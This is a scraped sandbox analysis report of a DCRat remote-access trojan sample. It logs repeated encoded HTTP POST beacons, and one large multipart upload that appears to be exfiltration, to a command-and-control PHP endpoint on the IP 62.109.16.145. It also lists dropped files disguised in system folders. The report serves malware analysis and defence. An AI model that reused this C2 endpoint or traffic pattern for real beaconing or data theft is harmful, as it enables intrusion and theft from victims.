Jan 9, 2025 04:12:23.223381996 CET	207	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:23.362193108 CET	405	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1044 Expect: 100-continue
Jan 9, 2025 04:12:23.715933084 CET	1044	OUT	Data Raw: 5f 57 5c 5e 5a 5c 5d 5a 55 56 55 5a 56 58 55 55 56 56 5a 53 55 53 53 59 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: _W\^Z\]ZUVUZVXUUVVZSUSSYT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&0*#Z (:'"=(-#4C$>:&(U,%Y3=/( \%#Y)
Jan 9, 2025 04:12:24.041769981 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:24.169742107 CET	151	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:24.323297024 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:24.669234037 CET	1048	OUT	Data Raw: 5f 51 59 5e 5f 5b 5d 5e 55 56 55 5a 56 5f 55 5d 56 5c 5a 5e 55 51 53 5c 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: _QY^_[]^UVUZV_U]V\Z^UQS\T[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&['348%&2=(> 4'=;-%9&+3$?#>$<? \%#Y)
Jan 9, 2025 04:12:25.003175020 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:25.133550882 CET	207	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FYKrlfQrxb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Google\Update\Install\bf3ea1d7b5d5e5

C:\Program Files (x86)\Google\Update\Install\zDqAlrJjQSnFyiiCVBYxCXJUQP.exe

C:\Program Files (x86)\Google\Update\Install\zDqAlrJjQSnFyiiCVBYxCXJUQP.exe:Zone.Identifier

C:\Program Files\Windows Mail\bf3ea1d7b5d5e5

C:\Program Files\Windows Mail\zDqAlrJjQSnFyiiCVBYxCXJUQP.exe

C:\Program Files\Windows Mail\zDqAlrJjQSnFyiiCVBYxCXJUQP.exe:Zone.Identifier

C:\Program Files\Windows Security\bf3ea1d7b5d5e5

C:\Program Files\Windows Security\zDqAlrJjQSnFyiiCVBYxCXJUQP.exe

C:\Program Files\Windows Security\zDqAlrJjQSnFyiiCVBYxCXJUQP.exe:Zone.Identifier

C:\Users\Public\Downloads\bf3ea1d7b5d5e5

Windows Analysis Report
FYKrlfQrxb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:25.287075996 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:25.637979031 CET	1048	OUT	Data Raw: 5a 51 5c 5c 5f 5d 58 5c 55 56 55 5a 56 5d 55 50 56 55 5a 5e 55 50 53 56 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: ZQ\\_]X\UVUZV]UPVUZ^UPSVT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&$?Z"(%'(=/7%(;%X1-<#2+);(/ \%#Y)0
Jan 9, 2025 04:12:25.981440067 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:26.114264965 CET	207	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:26.249624968 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:26.606586933 CET	1048	OUT	Data Raw: 5a 5b 59 59 5a 58 58 5b 55 56 55 5a 56 5a 55 56 56 56 5a 52 55 51 53 5f 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: Z[YYZXX[UVUZVZUVVVZRUQS_T[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&_3+\ 8-$2).+ C#]*&1<Z%,8\>?(/ \%#Y),
Jan 9, 2025 04:12:26.954299927 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:27.085659981 CET	207	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:26.302238941 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1752 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:26.653490067 CET	1752	OUT	Data Raw: 5f 51 59 5a 5a 5b 5d 5c 55 56 55 5a 56 58 55 57 56 55 5a 5a 55 52 53 5b 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: _QYZZ[]\UVUZVXUWVUZZURS[T[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW%$(4;-Z&"<.<738>'9?#Y%<<*<[< \%#Y)(
Jan 9, 2025 04:12:27.013259888 CET	25	IN	HTTP/1.1 100 Continue

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:26.385158062 CET	475	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----yy7bU66Cf92JLKX8naKXzxU4Ui5hPFbuf5 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 193638 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:26.731686115 CET	12360	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 79 79 37 62 55 36 36 43 66 39 32 4a 4c 4b 58 38 6e 61 4b 58 7a 78 55 34 55 69 35 68 50 46 62 75 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22 Data Ascii: ------yy7bU66Cf92JLKX8naKXzxU4Ui5hPFbuf5Content-Disposition: form-data; name="0"Content-Type: text/plainZPY__YXXUVUZVYU\V]Z\URSXT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^
Jan 9, 2025 04:12:26.737484932 CET	12360	OUT	Data Raw: 44 53 34 4d 2b 42 79 32 5a 56 67 53 54 46 2f 47 36 45 53 41 35 51 54 43 36 2b 48 57 4c 62 4d 6f 4c 6a 7a 67 6b 48 58 43 70 36 4e 6c 79 38 6e 67 46 59 4f 44 37 43 44 46 62 69 4f 52 6c 34 63 67 45 33 72 6f 33 4b 54 77 75 77 47 77 65 64 70 2b 5a 76 Data Ascii: DS4M+By2ZVgSTF/G6ESA5QTC6+HWLbMoLjzgkHXCp6Nly8ngFYOD7CDFbiORl4cgE3ro3KTwuwGwedp+ZvoZKrMPJ7DOT0NlT7B4YPWiBblizbsamdIfH39B42qca03yN22QwzWNwbMqs33vK0hFoBFlScoXyORcAfnvHfY1s5/xgKw1HviowttGdzpsdERpcp/yxiKaXk6G+U6Jo6yy69PK9KomK8ZPEltBw9ls6Mf2cLN72C4
Jan 9, 2025 04:12:26.737951040 CET	4944	OUT	Data Raw: 6c 44 63 30 72 7a 4d 35 5a 37 57 79 34 4d 37 62 31 71 5a 53 6a 41 66 41 2f 56 42 32 63 47 31 63 46 73 64 65 32 31 67 39 2b 47 71 63 76 45 72 6a 69 6c 37 59 67 4a 4f 33 61 6d 64 4c 4c 54 79 75 6b 36 31 33 6c 70 4b 77 65 52 38 53 6f 76 48 56 79 62 Data Ascii: lDc0rzM5Z7Wy4M7b1qZSjAfA/VB2cG1cFsde21g9+GqcvErjil7YgJO3amdLLTyuk613lpKweR8SovHVyb3gZ011U+2WuENoGurGPPvs58BvZE7CUT4Por5exz798Lrf10VuePZBr2iSK9n/Q9d/hzUVbN/jcBCkKypB6UVqQJAqvUvvoRdBQISAgICAgDRR1ABBOtJLQui9CghKR2qo0ns1IL2TN0HvvZ/v73nePxQ4OWcyyTm
Jan 9, 2025 04:12:26.738598108 CET	7416	OUT	Data Raw: 78 37 38 78 2f 66 66 6d 2f 4d 33 35 2f 53 30 76 70 57 69 48 38 6d 68 6f 2f 37 6e 4d 4b 35 41 62 47 70 2b 67 79 54 59 65 4e 2b 38 78 2f 4e 34 73 74 67 52 72 4e 66 4a 30 55 6f 68 65 53 53 35 2f 6c 4b 32 41 38 48 46 48 47 54 39 33 70 73 4a 79 47 57 Data Ascii: x78x/ffm/M35/S0vpWiH8mho/7nMK5AbGp+gyTYeN+8x/N4stgRrNfJ0UoheSS5/lK2A8HFHGT93psJyGWKrj4Fr9IHb+4Hnhkx/3h9/uAzuuMQAVDCANiMmq5ZACYmm8p30PXSi9Dq3Gnq5Ok2VQyFauY1Gx4aEaLNThOHVD7cUn6wtmETsqrY2pZEDF+Icwv0R9zGpYw1K5Xl71sm5LFXEDBnUiiiOlauaTq9PB85WmPY1crs
Jan 9, 2025 04:12:26.743333101 CET	7416	OUT	Data Raw: 41 4d 6a 4c 31 34 78 76 4b 31 36 35 6e 5a 38 66 62 5a 39 6b 47 33 37 73 48 70 47 31 2f 35 6c 64 4d 32 75 2f 4f 6c 55 35 46 73 58 78 68 57 71 6e 56 69 47 36 32 31 6c 50 77 64 30 65 2f 50 6a 54 32 46 62 75 39 2b 6c 5a 39 35 32 78 75 2f 4b 64 68 4f Data Ascii: AMjL14xvK165nZ8fbZ9kG37sHpG1/5ldM2u/OlU5FsXxhWqnViG621lPwd0e/PjT2Fbu9+lZ952xu/KdhOXO+/WdGRpe9RFFI3cE7kVnyik/B4vNl29539Re6RIXKRQDGGe+M3mXXjO1W7ZNuvStoEYPUn6H1UYiyE0bbl2nekBdXBHsIu8sPsr3O7P60QftO+YtnsQf2YfvCExoX9R5evXdXIxoprIg7XN239QdFCEp5i10/jH
Jan 9, 2025 04:12:26.743352890 CET	2472	OUT	Data Raw: 75 53 6b 4c 79 56 6c 41 53 48 31 4c 6c 72 58 34 38 2f 70 47 4f 30 62 68 50 47 72 79 61 70 56 79 67 34 49 48 56 71 33 36 41 68 4e 46 35 4c 42 59 65 73 6f 39 38 69 47 77 48 65 69 49 65 2b 45 7a 74 4e 52 47 63 53 42 4b 55 34 43 66 33 6d 4f 4c 75 79 Data Ascii: uSkLyVlASH1LlrX48/pGO0bhPGryapVyg4IHVq36AhNF5LBYeso98iGwHeiIe+EztNRGcSBKU4Cf3mOLuy7KYi2MfkAFuCDwHd5BZczQjnqqv9NG8DwMtqTkDxLoODaAP/8MteOQM4Yq1FKBzCBmD8BRjCCB46FOOPOgTbEwOdgmPbJl5u23fRNvOqhmwKvfNm8FtL+7S90EEXc0qsFS8+D+IJPM0JgaMy8hVZVl9RZaZRDyHOq
Jan 9, 2025 04:12:26.743387938 CET	4944	OUT	Data Raw: 61 79 2f 6d 52 64 77 76 53 4f 78 44 39 35 49 58 4d 55 36 35 62 37 77 50 6b 72 57 77 33 55 45 4f 43 35 31 41 2f 31 67 6f 42 43 2f 58 66 4f 46 51 34 67 79 70 58 47 57 4b 65 44 57 71 2f 32 6f 70 73 30 6b 78 6b 6e 79 75 51 47 6e 59 4f 4f 4c 67 76 76 Data Ascii: ay/mRdwvSOxD95IXMU65b7wPkrWw3UEOC51A/1goBC/XfOFQ4gypXGWKeDWq/2ops0kxknyuQGnYOOLgvvmmmyuib7fTNm3GdOsQfYGCK1jDxHpe1Pb7ahRUlZaX19bu/bT6pSgN5zb2qFAu3ArQfwceX49+3U8w+qJsttdpgVjpY4SIl84DH/hF1L3liQaPWDzJl6CzkiQWVw+bPdM2ZwJd5Rj0azhUJLJHmdut9mFPLfPOFL4
Jan 9, 2025 04:12:26.744024992 CET	4944	OUT	Data Raw: 4e 4c 61 6f 74 34 2f 33 33 75 4d 41 41 66 39 37 56 77 50 78 53 75 55 32 63 72 49 47 57 32 58 72 36 4c 44 51 74 32 33 35 76 73 35 58 53 5a 57 70 6d 74 79 46 54 6f 43 6e 4d 30 6d 35 4e 4f 2b 61 33 32 63 31 6a 38 39 70 59 33 53 6f 31 71 31 4c 59 61 Data Ascii: NLaot4/33uMAAf97VwPxSuU2crIGW2Xr6LDQt235vs5XSZWpmtyFToCnM0m5NO+a32c1j89pY3So1q1LYamtSRPjOTH3rL9GyqUTdefRrw6073BDM948P+offR4g8KglndPxZ3NY00HFm+02dkxepgQ3YW952rvd2NzzL7/Yr3+U0NBG1f7GnnR0pBy6S+HNsLWRjqyOb83q6lhkN96gem3nfMQipNaY3smafTBQgwMuX/I7W80
Jan 9, 2025 04:12:26.788294077 CET	32136	OUT	Data Raw: 77 35 2f 70 35 74 73 72 43 65 30 5a 4c 32 75 72 47 76 79 71 54 6b 36 71 41 41 65 4f 6d 75 76 34 4d 70 67 46 4e 66 6a 79 38 68 78 34 4d 46 6e 56 6a 64 52 39 4d 75 4b 54 30 42 67 64 66 4d 70 66 67 72 46 35 37 4a 63 70 36 66 61 47 5a 36 61 79 68 46 Data Ascii: w5/p5tsrCe0ZL2urGvyqTk6qAAeOmuv4MpgFNfjy8hx4MFnVjdR9MuKT0BgdfMpfgrF57Jcp6faGZ6ayhF+apTqa7g11Nw0Nf9Pdu1J0js25XIIBDScTfyY3IZBV09dhRnkMzsOWeTnYjVXbZL9rHoqMMyQqIe3eD1tMDxwBoXGPAIzG5ym9nyQ/i313nG6mrt0xqojcqSXjk2c2fVBQfLVK4oO9bH7xAE/8Dfm0MUWbhfsuby4
Jan 9, 2025 04:12:26.838779926 CET	1236	OUT	Data Raw: 49 2f 4c 35 6d 56 79 41 72 7a 46 2b 37 58 41 4f 31 4a 50 48 43 62 77 6e 4f 33 34 50 67 31 71 63 56 36 72 66 55 4a 5a 4f 7a 64 69 64 44 4f 33 32 6c 76 30 57 4f 78 6b 39 4f 43 4e 56 50 56 68 61 45 65 4c 49 76 75 51 77 58 44 38 6c 4a 64 55 74 65 47 Data Ascii: I/L5mVyArzF+7XAO1JPHCbwnO34Pg1qcV6rfUJZOzdidDO32lv0WOxk9OCNVPVhaEeLIvuQwXD8lJdUteGJW/cDuw7DxN11rO+6GSavyOE2uSr9iqtPe/N91xOISNKbYhBkaTWh0igdme/cOJSxN6LT7Mwba4h1EXTo97+VO+WvK512GfTt3ENjWGjplZeEpHvLVWN1hpmTt5NU2VWwVX7Qc3qstcH3ZTLoDFF/O0Au/W1107mv
Jan 9, 2025 04:12:27.062608957 CET	25	IN	HTTP/1.1 100 Continue

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:27.217174053 CET	405	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue
Jan 9, 2025 04:12:27.575614929 CET	1048	OUT	Data Raw: 5f 56 59 51 5f 5d 58 51 55 56 55 5a 56 5c 55 52 56 50 5a 5a 55 57 53 5f 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: _VYQ_]XQUVUZV\URVPZZUWS_T[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW%393]4*$:+X4 #=6&)P(,&$><X+ \%#Y)4
Jan 9, 2025 04:12:27.927318096 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:28.062108994 CET	151	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:28.188266993 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:28.544018984 CET	1048	OUT	Data Raw: 5a 52 5c 5a 5f 5c 58 59 55 56 55 5a 56 50 55 52 56 50 5a 5e 55 54 53 57 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: ZR\Z_\XYUVUZVPURVPZ^UTSWT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW%'+Z ;%Z0%<-?Z#%])51_=#X%/_=<Z+ \%#Y)
Jan 9, 2025 04:12:28.900443077 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:29.033778906 CET	207	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:29.154784918 CET	405	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue
Jan 9, 2025 04:12:29.512839079 CET	1048	OUT	Data Raw: 5f 56 59 58 5a 59 5d 5b 55 56 55 5a 56 59 55 53 56 5c 5a 5d 55 54 53 57 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: _VYXZY][UVUZVYUSV\Z]UTSWT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&3#[#8:$X)-/#%3>8%2)(/2?8Y*$<(/ \%#Y)
Jan 9, 2025 04:12:29.874089003 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:30.010582924 CET	151	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:30.139869928 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1044 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:30.497149944 CET	1044	OUT	Data Raw: 5a 5b 59 5b 5f 5e 58 5b 55 56 55 5a 56 58 55 5d 56 51 5a 52 55 50 53 5f 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: Z[Y[_^X[UVUZVXU]VQZRUPS_T[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW%$)4;)_0T.<> 6/]=')!3($?/=$$Y/ \%#Y)
Jan 9, 2025 04:12:30.832426071 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:30.961610079 CET	207	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:31.094048977 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1044 Expect: 100-continue Connection: Keep-Alive
